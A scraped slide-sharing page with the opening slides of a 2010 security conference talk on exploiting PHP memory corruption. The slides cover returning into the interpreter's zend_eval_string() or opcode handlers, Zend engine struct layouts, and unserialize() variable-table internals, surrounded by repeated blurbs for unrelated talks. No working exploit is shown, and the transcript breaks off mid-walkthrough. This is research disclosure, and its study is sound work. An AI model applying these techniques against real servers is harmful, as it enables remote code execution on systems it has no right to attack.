The document discusses returning into the PHP interpreter through memory corruption exploits, focusing on exploiting a 0-day vulnerability in PHP's unserialize() function. It explains how unserialize() builds a variable table during deserialization to support references, and demonstrates how corrupting this process could allow returning into the PHP interpreter and gaining remote code execution. Potential attack vectors for returning into PHP functions, the bytecode executor, and zend_eval_string() are also outlined.
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
In these slides we provides information about new technology (CSR) to learn you how to customize the way users interact with list data, and how to develop solutions that change the way data is rendered.
Live Memory Forensics on Android devicesNikos Gkogkos
This presentation deals with some RAM forensics on the Android OS using the LiME tool for getting a RAM dump and the Volatility framework for the analysis part!
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
Die ultimative Anleitung für HCL Nomad Web Administratorenpanagenda
Webinar Recording: https://www.panagenda.com/webinars/die-ultimative-anleitung-fur-hcl-nomad-web-administratoren/
HCL Nomad Web ist DAS heiße Thema in der Notes-Welt. Immer mehr Unternehmen erwägen, ihre HCL Notes-Landschaft mit Nomad Web zu ergänzen oder sogar komplett zu ersetzen. Es ist verständlich, dass die Veränderungen und neuen Technologien überwältigend wirken können. Um dem entgegenzuwirken, erfahren Sie in diesem Webinar alles, was Sie über Nomad wissen müssen – angefangen von den ersten Schritten bis hin zum endgültigen Rollout bei den Anwendern. Alles praxisnah und leicht verständlich erklärt.
Verpassen Sie auf keinen Fall dieses aufschlussreiche Webinar mit dem renommierten HCL Ambassador Marc Thomas. Gewinnen Sie wertvolle Erkenntnisse, die Sie sofort in die Tat umsetzen können, denn alles, was Sie brauchen, ist in Ihrer HCL CCB-Lizenz bereits enthalten oder kostenlos erhältlich. Egal, ob Sie bereits in die Welt von HCL Nomad Web eingetaucht sind, den Einstieg planen oder einfach nur neugierig sind, ob die Lösung auch für Sie geeignet ist – wenn Sie nicht in der Vergangenheit stecken bleiben wollen, sollten Sie dieses Webinar nicht verpassen!
Was Sie lernen werden
- Anforderungen, Vorteile, und Beschränkungen von HCL Nomad Web
- Installation auf dem Server (mit und ohne HCL SafeLinx)
- Initiales Setup für Endbenutzer inkl. Übernahme des bestehenden Notes Client Arbeitsbereiches
- Umgang mit virtuellen Infrastrukturen wie Citrix, VMWare, TS und VDI
- Betrieb, Optimierung und Fehlerbehebung auf Server und Client
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
Admin Tips In 60 Minutes
In this high speed session I take you through the best admin tips for Domino, Notes, Sametime, Traveler and more. From notes.ini values, to server configuration settings and valuable customisations.
Some tips will be new to v10 and some have been around but rarely used for years.
Whatever your experience there will be something new for you to take away and enjoy.
Presented at Engage.ug in Brussels May 2019
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
With the release of iOS6 Apple has cracked down on all published iOS exploitation information. It seems that nearly every trick and technique discussed in talks/papers or books of the last years has been taken care of by Apple in order to stop exploitation for jailbreaking or more malicious purposes.
This talk will tie in with the iOS6 Security talk by Azimuth Security that discussed various kernel hardenings performed by Apple, and discuss further security relevant changes in iOS 6.1 kernel affecting kernel exploitation and user space exploitation.
SyScan 2015 Bonus Slides - death of the vmsize=0 dyld trickStefan Esser
During my talk at SyScan 2015 i promised to disclose among all the fail of Apple how their patches for "Patient ALPHA" actually killed a previously unknown 0-day incomplete code signing vulnerability that was just waiting to be used in the next jailbreak.
General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.
In these slides we provides information about new technology (CSR) to learn you how to customize the way users interact with list data, and how to develop solutions that change the way data is rendered.
Live Memory Forensics on Android devicesNikos Gkogkos
This presentation deals with some RAM forensics on the Android OS using the LiME tool for getting a RAM dump and the Volatility framework for the analysis part!
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
Regardless on how sophisticated your framework is, how many layers of firewalls and mitigation techniques that are put in place, there's a common weakness that often gets overlooked: the insecure direct object reference. The flaw exist everywhere: WordPress with username enumeration issues. Twitter where remote attackers could delete credit cards for the ad service and to OculusVR with a horizontal privilege escalation vulnerability which got disclosed recently.
Die ultimative Anleitung für HCL Nomad Web Administratorenpanagenda
Webinar Recording: https://www.panagenda.com/webinars/die-ultimative-anleitung-fur-hcl-nomad-web-administratoren/
HCL Nomad Web ist DAS heiße Thema in der Notes-Welt. Immer mehr Unternehmen erwägen, ihre HCL Notes-Landschaft mit Nomad Web zu ergänzen oder sogar komplett zu ersetzen. Es ist verständlich, dass die Veränderungen und neuen Technologien überwältigend wirken können. Um dem entgegenzuwirken, erfahren Sie in diesem Webinar alles, was Sie über Nomad wissen müssen – angefangen von den ersten Schritten bis hin zum endgültigen Rollout bei den Anwendern. Alles praxisnah und leicht verständlich erklärt.
Verpassen Sie auf keinen Fall dieses aufschlussreiche Webinar mit dem renommierten HCL Ambassador Marc Thomas. Gewinnen Sie wertvolle Erkenntnisse, die Sie sofort in die Tat umsetzen können, denn alles, was Sie brauchen, ist in Ihrer HCL CCB-Lizenz bereits enthalten oder kostenlos erhältlich. Egal, ob Sie bereits in die Welt von HCL Nomad Web eingetaucht sind, den Einstieg planen oder einfach nur neugierig sind, ob die Lösung auch für Sie geeignet ist – wenn Sie nicht in der Vergangenheit stecken bleiben wollen, sollten Sie dieses Webinar nicht verpassen!
Was Sie lernen werden
- Anforderungen, Vorteile, und Beschränkungen von HCL Nomad Web
- Installation auf dem Server (mit und ohne HCL SafeLinx)
- Initiales Setup für Endbenutzer inkl. Übernahme des bestehenden Notes Client Arbeitsbereiches
- Umgang mit virtuellen Infrastrukturen wie Citrix, VMWare, TS und VDI
- Betrieb, Optimierung und Fehlerbehebung auf Server und Client
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
In this talk, top ranked white-hat hacker Frans Rosén (@fransrosen) will focus on methodologies and results of attacking modern web technologies. He will do a deep-dive in postMessage, how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
Listen to 60 minutes of new hacks, bug bounty stories and learnings that will make you realize that the protocols and policies you believed to be secure are most likely not.
Admin Tips In 60 Minutes
In this high speed session I take you through the best admin tips for Domino, Notes, Sametime, Traveler and more. From notes.ini values, to server configuration settings and valuable customisations.
Some tips will be new to v10 and some have been around but rarely used for years.
Whatever your experience there will be something new for you to take away and enjoy.
Presented at Engage.ug in Brussels May 2019
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
With the release of iOS6 Apple has cracked down on all published iOS exploitation information. It seems that nearly every trick and technique discussed in talks/papers or books of the last years has been taken care of by Apple in order to stop exploitation for jailbreaking or more malicious purposes.
This talk will tie in with the iOS6 Security talk by Azimuth Security that discussed various kernel hardenings performed by Apple, and discuss further security relevant changes in iOS 6.1 kernel affecting kernel exploitation and user space exploitation.
SyScan 2015 Bonus Slides - death of the vmsize=0 dyld trickStefan Esser
During my talk at SyScan 2015 i promised to disclose among all the fail of Apple how their patches for "Patient ALPHA" actually killed a previously unknown 0-day incomplete code signing vulnerability that was just waiting to be used in the next jailbreak.
SyScan 2015 - iOS 678 Security - A Study in FailStefan Esser
Talk from SyScan 2015 about Apple Security failing to patch vulnerabilities over and over again, because they have apparently no QA at all on security patches.
Ruxcon 2014 - Stefan Esser - iOS8 Containers, Sandboxes and EntitlementsStefan Esser
iOS 8 specific security talk given at Ruxcon 2014 security conference. Includes description of kernel vulnerability used to break KASLR in Pangu 7.1 + TAIG 8.1.1 jailbreaks.
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
Targeting the iOS Kernel
Although the iPhone user land is locked down very tightly, previous talks about iPhone security have concentrated on user land attacks only. Therefore demonstrated exploit payloads have been very limited in what they can do or cannot do. More complicated work like user land rootkits or the addition of ASLR protection therefore relied entirely on kernel exploitation help from the jailbreaking community.
This presentation will introduce the audience into finding security bugs in iOS kernelspace and how this is different from hunting kernel bugs in Mac OS X. Reverse engineering will be used to extract a lot of information from the kernelcache and then this information is used to enumerate the kernel's attack surface and the corresponding code is located. In addition to that the secrets of activating the iOS internal kernel debugger will be revealed and it will be demonstrated by debugging a previous disclosed iOS kernel exploit.
SyScan360 - Stefan Esser - OS X El Capitan sinking the S\H/IPStefan Esser
With the release of OS X El Capitan Apple has introduced a new protection to the OS X kernel called System Integrity Protection (SIP). The purpose of this new mitigation is to lock down the system from attackers who have already gained root access.
In the first part of this session we will elaborate what exactly SIP tries to protect against and how its features are implemented and integrated into the kernel. In the second part of this presentation we will then dive into obvious shortcomings of this implementation and discuss design weaknesses and actual bugs that allow to bypass it. All weaknesses will be demoed to the audience.
BlackHat USA 2011 - Stefan Esser - iOS Kernel ExploitationStefan Esser
Exploiting the iOS Kernel
The iPhone user land is locked down very tightly by kernel level protections. Therefore any sophisticated attack has to include a kernel exploit in order to completely compromise the device. Because of this our previous session titled "Targeting the iOS Kernel" already discussed how to reverse the iOS kernel in order to find kernel security vulnerabilities. Exploitation of iOS kernel vulnerabilities has not been discussed yet.
This session will introduce the audience to kernel level exploitation of iPhones. With the help of previously disclosed kernel vulnerabilities the exploitation of uninitialized kernel variables, kernel stack buffer overflows, out of bound writes and kernel heap buffer overflows will be discussed.
Furthermore the kernel patches applied by iPhone jailbreaks will be discussed in order to understand how certain security features are deactivated. A tool will be released that allows to selectively de-activate some of these kernel patches for more realistic exploit tests.
DevConf 2016
"Развитие ветки PHP-7", Дмитрий Стогов (Zend Technologies)
Я расскажу о внутреннем устройстве PHP-7.0, изменениях готовящихся в PHP-7.1 и планах на PHP-7.2.
My slides from "Inside PHP", a talk about how to change the syntax of the PHP programming language.
Modified PHP 5.4.4 source code (with the "until" keyword added during this presentation) is available here:
http://github.com/thomaslee/oscon2012-inside-php
Create your own PHP extension, step by step - phpDay 2012 VeronaPatrick Allaert
Ever been interested by contributing to the PHP core team?
In this workshop you will not only learn how (easy it is) to create your own PHP extension from scratch but you will also strengthen your knowledge of PHP by disecting its internals.
After this workshop, you will be able to create an extension on your own, whether it is to optimize the most CPU intensive parts of your code, to create new bindings to C libraries or just to leverage your PHP knowledge.
And what if PHP was a web framework for the C developer?
This workshop requires a bit of C knowledge and preferably a *nix system.
This presentation of ROBO INDIA comprises all of the elements that must be known to learn the programming language C.
This ppt also explains all these topics in details.
We welcome all you views and queries. Please write us, we are found at-
website: http://roboindia.com
mail: info@roboindia.com
Как мы сделали PHP 7 в два раза быстрее PHP 5 / Дмитрий Стогов (Zend Technolo...Ontico
PHP 7.0 вышел год назад и уже используется многими крупными компаниями. Почти все они отмечают, что переход с PHP 5 дал приблизительно двукратное увеличение производительности на своих реальных задачах, позволив сократить количество серверов.
Я расскажу о том, как мы пришли к идеям, легшим в основу PHP 7; о внутреннем устройстве PHP, изменениях в базовых структурах данных и алгоритмах, определивших успех; новых идеях, реализуемых в еще не вышедших версиях.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Enhancing Performance with Globus and the Science DMZGlobus
ESnet has led the way in helping national facilities—and many other institutions in the research community—configure Science DMZs and troubleshoot network issues to maximize data transfer performance. In this talk we will present a summary of approaches and tips for getting the most out of your network infrastructure using Globus Connect Server.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
SyScan Singapore 2010 - Returning Into The PHP-Interpreter
1. http://www.sektioneins.de
Returning into the PHP Interpreter
memory corruption exploits against PHP are not over yet
Stefan Esser <stefan.esser@sektioneins.de>
SyScan 2010
Singapore
2. Who am I?
Stefan Esser
• from Cologne/Germany
• Information Security since 1998
• PHP Core Developer since 2001
• Suhosin / Hardened-PHP 2004
• Month of PHP Bugs 2007 / Month of PHP Security 2010
• Head of Research & Development at SektionEins GmbH
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 2
3. Month of PHP Security 2010
• May 2010 was the Month of PHP Security
• PHP security conference without a conference
• sponsored by SyScan/Coseinc, SektionEins and CodeScan Ltd.
• We disclosed 60 vulnerabilities in PHP and PHP applications in 31 days
• We released 10 user submitted PHP security articles/tools
• Submitters could win attractive prizes
• Winner was Solar Designer -
if you haven‘t heard of him leave the room NOW
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 3
4. Part I
Introduction
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 4
5. Introduction (I)
Random Quotes from the Web Application Security World
• „80% of web sites are vulnerable to XSS“
• „Web Applications don‘t get hacked by memory
corruption or buffer overflow bugs“
• „Attacking webservers via memory corruption
vulnerabilities has become too difficult anyway“
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 5
6. Introduction (II)
SektionEins‘s reality
• „80% of PHP application source code we audit contains
remote code exec vulnerabilities“
• „Web Applications expose buffer overflows and memory corruption
vulnerabilities in PHP to remote attackers“
• „There are still sweet bugs that can be exploited“
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 6
7. Introduction (III)
What the talk is about?
• Returning into the PHP interpreter in memory corruption exploits
• A 0-day vulnerability in a PHP function
• and how to exploit it
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 7
8. Part II
Returning into the PHP Interpreter
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 8
9. Why return into the PHP interpreter?
• bypassing true NX requires ROP
• bypassing ASLR requires information leaks
• returning into the PHP interpreter requires only one leaked address
• PHP is a powerful scripting language to write shellcode in
• local vulnerabilities in PHP allow arbitrary memory access
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 9
10. How to return into the PHP interpreter?
• returning into PHP functions?
• returning into the bytecode executor?
• returning into opcode handlers?
• returning into zend_eval_string() functions?
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 10
11. Returning into PHP functions
• There are two kinds of PHP functions
• user-space (byecode executor)
• internal (C function)
• Argument stack on heap - no control over arguments
• For PHP 5.3.x call stack is also on heap
• only useable if there a PHP function that
• does exactly what we need
• does not require parameters - but allows the same function parameters as
current function
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 11
12. Returning into the bytecode executor (I)
struct _zend_op_array {
/* Common elements */
zend_uchar type;
char *function_name;
...
/* END of common elements */
zend_bool done_pass_two;
zend_uint *refcount;
• Returning into the execute() function zend_op *opcodes;
zend_uint last, size;
• Requires an op_array struct parameter zend_compiled_variable *vars;
int last_var, size_var;
zend_uint T;
• Several fields have to be valid data zend_brk_cont_element *brk_cont_array;
int last_brk_cont;
int current_brk_cont;
• last_var zend_try_catch_element *try_catch_array;
int last_try_catch;
• T /* static variables support */
HashTable *static_variables;
zend_op *start_op;
• this_var = -1 int backpatch_count;
zend_uint this_var;
• opcodes = start_op char *filename;
zend_uint line_start;
zend_uint line_end;
char *doc_comment;
zend_uint doc_comment_len;
zend_uint early_binding;
void *reserved[ZEND_MAX_RESERVED_RESOURCES];
};
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 12
13. Returning into the bytecode executor (II)
struct _zend_op {
opcode_handler_t handler;
znode result;
znode op1;
znode op2;
ulong extended_value;
• Opcode injection requires to know uint lineno;
the handler address zend_uchar opcode;
};
• Alternatively before returning to execute() a
return into pass_two() is required typedef struct _znode {
int op_type;
• Injected opcodes should use as few data union {
pointers as possible zval constant;
zend_uint var;
zend_uint opline_num;
• easiest solution just creates a string zend_op_array *op_array;
char by char and evaluates it zend_op *jmp_addr;
struct {
zend_uint var;
zend_uint type;
} EA;
} u;
} znode;
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 13
15. Returning into Opcode handlers (I)
struct _zend_execute_data {
struct _zend_op *opline;
zend_function_state function_state;
zend_function *fbc; /* Function Being Called */
• Returning into the C implementation zend_class_entry *called_scope;
zend_op_array *op_array;
of an opcode handler zval *object;
union _temp_variable *Ts;
• Difficulty: opcode handlers are fastcall zval ***CVs;
HashTable *symbol_table;
struct _zend_execute_data *prev_execute_data;
• parameter execute_data is zval *old_error_reporting;
passed in ECX zend_bool nested;
zval **original_return_value;
zend_class_entry *current_scope;
• need to return into pop ecx, ret first zend_class_entry *current_called_scope;
zval *current_this;
zval *current_object;
struct _zend_op *call_opline;
};
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 15
16. Returning into Opcode handlers (II)
• There seem to be several interesting opcodes
• ZEND_INCLUDE_OR_EVAL
• ZEND_JMPxx
• ZEND_GOTO
• But only ZEND_INCLUDE_OR_EVAL is directly useful
• Requires to know the address of the handler and the string to eval
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 16
17. Returning into zend_eval_string() functions (I)
• returning into C functions evaluating PHP code
• zend_eval_string()
• zend_eval_stringl()
• zend_eval_string_ex()
• zend_eval_stringl_ex()
• easiest way to return into PHP shellcode
• like ret2libc but returning into PHP‘s own C functions
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 17
18. Returning into zend_eval_string() functions (II)
pro:
• simple arguments
• pointer to PHP code
• NULL (or empty writeable memory address)
• pointer to readable memory
• only one function address must be known: zend_eval_string()
con:
• plaintext PHP code in request data (obfucate PHP code!!!)
• eval() could be disabled by Suhosin
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 18
20. unserialize()
• allows to deserialize serialized PHP variables
• supports most PHP variable types
• integers / floats / boolean
• strings / array / objects
• references
• often exposed to user input
• many vulnerabilities in the past
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 20
21. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
array
Unserialize keeps a table of
all created variables during
deserialization in order to
support references
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 21
22. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
array
0 0
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 22
23. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
0 0
1 2.0
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 23
24. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
1 2.0
2 “ABCD“
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 24
25. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
5
1 2.0
2 “ABCD“
3 2.0
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 25
26. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
5;C:16:"SplObjectStorage":14:{x:i:0;m:a:0:{}}
2
3
array
4
0 0
5
stdClass 1 2.0
6
2 “ABCD“
3 2.0
4 stdClass
Stefan Esser • Returning into the PHP Interpreter • July 2010 • 26
27. unserialize()
a:6:{i:0;i:0;i:1;d:2;i:2;s:4:"ABCD";i:3;r:3;i: var_table
4;O:8:"stdClass":2:{s:1:"a";r:6;s:1:"b";N;};i:
1
